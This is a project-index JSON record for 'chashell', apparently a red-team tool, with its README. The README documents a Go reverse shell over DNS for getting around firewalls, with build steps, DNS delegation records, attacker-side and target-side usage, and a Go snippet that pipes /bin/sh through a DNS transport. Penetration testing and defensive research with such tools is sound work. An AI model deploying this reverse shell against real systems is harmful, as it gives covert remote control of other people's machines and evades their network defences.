{"id":13509907,"url":"https://github.com/sysdream/chashell","last_synced_at":"2026-02-22T01:42:36.377Z","repository":{"id":37431302,"uuid":"170881259","full_name":"sysdream/chashell","owner":"sysdream","description":"Chashell is a Go reverse shell that communicates over DNS. It can be used to bypass firewalls or tightly restricted networks.","archived":false,"fork":false,"pushed_at":"2022-04-05T17:22:14.000Z","size":141,"stargazers_count":1014,"open_issues_count":4,"forks_count":128,"subscribers_count":22,"default_branch":"master","last_synced_at":"2024-03-26T17:20:58.437Z","etag":null,"topics":["infosec","pentest","redteam","reverse-shell"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/sysdream.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-02-15T14:54:48.000Z","updated_at":"2024-03-25T23:19:00.000Z","dependencies_parsed_at":"2022-07-12T13:19:43.783Z","dependency_job_id":null,"html_url":"https://github.com/sysdream/chashell","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/sysdream/chashell","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sysdream%2Fchashell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sysdream%2Fchashell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sysdream%2Fchashell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sysdream%2Fchashell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/sysdream","download_url":"https://codeload.github.com/sysdream/chashell/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sysdream%2Fchashell/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29703227,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-21T23:35:04.139Z","status":"ssl_error","status_checked_at":"2026-02-21T23:35:03.832Z","response_time":107,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["infosec","pentest","redteam","reverse-shell"],"created_at":"2024-08-01T02:01:16.724Z","updated_at":"2026-02-22T01:42:36.346Z","avatar_url":"https://github.com/sysdream.png","language":"Go","funding_links":[],"categories":["Go","\u003ca id=\"946d766c6a0fb23b480ff59d4029ec71\"\u003e\u003c/a\u003e防护\u0026\u0026Defense","Go (531)","\u003ca id=\"0abd611fc3e9a4d9744865ca6e47a6b2\"\u003e\u003c/a\u003e工具","redteam","Command and Control"],"sub_categories":["\u003ca id=\"ce6532938f729d4c9d66a5c75d1676d3\"\u003e\u003c/a\u003e防火墙\u0026\u0026FireWall"],"readme":"# Chashell\n\n## Reverse Shell over DNS\n\nChashell is a [Go](https://golang.org/) reverse shell that communicates over DNS. \nIt can be used to bypass firewalls or tightly restricted networks.\n\nIt comes with a multi-client control server, named `chaserv`.\n\n![Chaserv](img/chaserv.gif)\n\n### Communication security\n\nEvery packet is encrypted using symmetric cryptography ([XSalsa20](https://en.wikipedia.org/wiki/Salsa20) + [Poly1305](https://en.wikipedia.org/wiki/Poly1305)), with a shared key between the client\nand the server.\n\nWe plan to implement asymmetric cryptography in the future.\n\n### Protocol\n\nChashell communicates using [Protocol Buffers](https://developers.google.com/protocol-buffers/) serialized messages. For reference, the Protocol Buffers structure (`.proto` file) is available in the `proto` folder.\n\nHere is a (simplified) communication chart :\n\n![Protocol](img/proto.png)\n\nKeep in mind that every packet is encrypted, hex-encoded and then packed for DNS transportation.\n\n### Supported systems\n\nChashell should work with any desktop system (Windows, Linux, Darwin, BSD variants) that is supported by the Go compiler.\n\nWe tested those systems and it works without issues :\n\n* Windows (386/amd64)\n* Linux (386/amd64/arm64)\n* OS X (386/amd64)\n\n### How to use Chaserv/Chashell\n\n#### Building\n\nMake sure the [GOPATH](https://github.com/golang/go/wiki/GOPATH) environment variable is correctly configured before running these commands.\n\nBuild all the binaries (adjust the domain_name and the encryption_key to your needs):\n\n\n```\n$ export ENCRYPTION_KEY=$(python -c 'from os import urandom; print(urandom(32).encode(\"hex\"))')\n$ export DOMAIN_NAME=c.sysdream.com\n$ make build-all\n```\n\nBuild for a specific platform:\n\n```\n$ make build-all OSARCH=\"linux/arm\"\n```\n\nBuild only the server:\n\n```\n$ make build-server\n```\n\nBuild only the client (*chashell* itself):\n\n```\n$ make build-client\n```\n\n#### DNS Settings\n\n* Buy and configure a domain name of your choice (preferably short).\n* Set a DNS record like this : \n\n```\nchashell 300 IN A [SERVERIP]\nc 300 IN NS chashell.[DOMAIN].\n```\n\n#### Usage\n\nBasically, on the server side (attacker's computer), you must use the `chaserv` binary. For the client side (i.e the target), use the `chashell` binary.\n\nSo:\n\n* Run `chaserv` on the control server.\n* Run `chashell` on the target computer.\n\nThe client should now connect back to `chaserv`:\n\n```\n[n.chatelain]$ sudo ./chaserv\nchashell \u003e\u003e\u003e New session : 5c54404419e59881dfa3a757\nchashell \u003e\u003e\u003e sessions 5c54404419e59881dfa3a757\nInteracting with session 5c54404419e59881dfa3a757.\nwhoami\nn.chatelain\nls /\nbin\nboot\ndev\n[...]\nusr\nvar\n```\n\nUse the `sessions [sessionid]` command to interact with a client.\nWhen interacting with a session, you can use the `background` command in order to return to the `chashell` prompt.\n\nUse the `exit` command to close `chaserv`.\n\n## Implement your own\n\nThe `chashell/lib/transport` library is compatible with the `io.Reader` / `io.Writer` interface. So, implementing a reverse shell is as easy as :\n\n```go\ncmd := exec.Command(\"/bin/sh\")\n\ndnsTransport := transport.DNSStream(targetDomain, encryptionKey)\n\ncmd.Stdout = dnsTransport\ncmd.Stderr = dnsTransport\ncmd.Stdin = dnsTransport\ncmd.Run()\n```\n\n## Debugging\n\nFor more verbose messages, add `TAGS=debug` at the end of the make command.\n\n## To Do\n\n* Implement asymmetric cryptography ([Curve25519](https://en.wikipedia.org/wiki/Curve25519), [XSalsa20](https://en.wikipedia.org/wiki/Salsa20) and [Poly1305](https://en.wikipedia.org/wiki/Poly1305))\n* Retrieve the host name using the `InfoPacket` message.\n* Create a *proxy/relay* tool in order to tunnel TCP/UDP streams (Meterpreter over DNS !).\n* Better error handling.\n* Get rid of dependencies.\n\n## Credits\n\n* Nicolas Chatelain \u003cn.chatelain -at- sysdream.com\u003e","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsysdream%2Fchashell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fsysdream%2Fchashell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsysdream%2Fchashell/lists"}